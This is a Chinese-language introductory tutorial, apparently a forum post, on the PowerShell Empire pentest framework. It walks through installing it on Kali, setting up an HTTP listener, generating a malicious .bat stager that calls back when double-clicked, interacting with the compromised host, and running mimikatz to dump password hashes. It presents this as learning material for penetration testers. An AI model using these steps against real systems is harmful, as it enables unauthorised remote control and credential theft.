Empire入门学习
>Empire是针对Windows平台的,使用PowerShell脚本作为测试载荷的渗透测试测试框架,具有stager生成提权、权限维持的功能。Empire无需powershell.exe就能运行power shell代理的功能,有许多后期漏洞利用模块。类似于msf。!(data/attachment/forum/202211/17/222849jvm5541z8p8lov9v.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "1491573871.jpg")
!
### 在kali中安装
在kali中安装很简单,我们只需执行下面命令即可。
```
sudo apt install powershell-empire
```
![]
### 启动服务端
这个和我们之前讲过的cs一样。有客户端和服务端。我们先来启动`Empire powershell`服务端
```
powershell-empire server
```
![]
### 启动Empire powershell 客户端
```
powershell-empire client
```
![]
### 牛刀小试
`Empire`的使用方法与`msf`的方法相同,先设置监听,生成Shell,然后监听反弹代理。
输入`Listeners`进入监听页面,`uselistener`设置监听模式,共有7种模式
- dbx
- http
- http_foreign
- http_hop
- http_mapi
- http_com
- meterpreter
这里,我们以`http`模块为例:
```
uselistener http #监听方式为http
set Port 4321 #设置端口
execute #运行
```
![]
现在配置完监听模块,我们来看看怎样生成shell.
!!!
<div class="ad">
<img class="adimg" src="https://blog.bbskali.cn/ad/wx1.png">
</div>
!!!
使用`windows/launcher_bat`模块,来生成恶意shell。
```
usestager windows/launcher_bat
set Listener http #设置监听方式
execute #运行
```
执行完成上面的命令后,我们的恶意文件已经生成。格式为`bat`
![]
![]
双击运行后,我们可以看到已经成功得到了会话。输入`agents`可以查看连接上的计算机的详细信息。
![]
### 连接设备
和msf一样,我们需要连接当前在线的设备。`interact 设备name`
```
interact V1T86EUN
```
![]
运行help命令,可以看到具体的帮助文档。
![]
由于命令比较多,这里我列举常用的一些命令
**进入系统cmd**
```
shell
```
![]
**使用内置的mimikatz抓取hash和密码**
```
mimikatz
```
**设备详细信息**
```
info
```
!
### 总结
empire模块和msf一样,功能很强大。配置相比msf略有不同。后期的文章中,我们还会重点更新!喜欢的小伙伴们欢迎点赞收藏!
: https://blog.bbskali.cn/usr/uploads/2022/11/3392759065.jpg
: https://blog.bbskali.cn/usr/uploads/2022/11/1726391229.png
: https://blog.bbskali.cn/usr/uploads/2022/11/782013525.png
: https://blog.bbskali.cn/usr/uploads/2022/11/3227777116.png
: https://blog.bbskali.cn/usr/uploads/2022/11/2825878783.png
: https://blog.bbskali.cn/usr/uploads/2022/11/4041052440.png
: https://blog.bbskali.cn/usr/uploads/2022/11/3773782073.png
: https://blog.bbskali.cn/usr/uploads/2022/11/3629749924.png
: https://blog.bbskali.cn/usr/uploads/2022/11/1766095549.png
: https://blog.bbskali.cn/usr/uploads/2022/11/3753414467.png
: https://blog.bbskali.cn/usr/uploads/2022/11/1635092308.png
: https://blog.bbskali.cn/usr/uploads/2022/11/2471485958.png
页:
[1]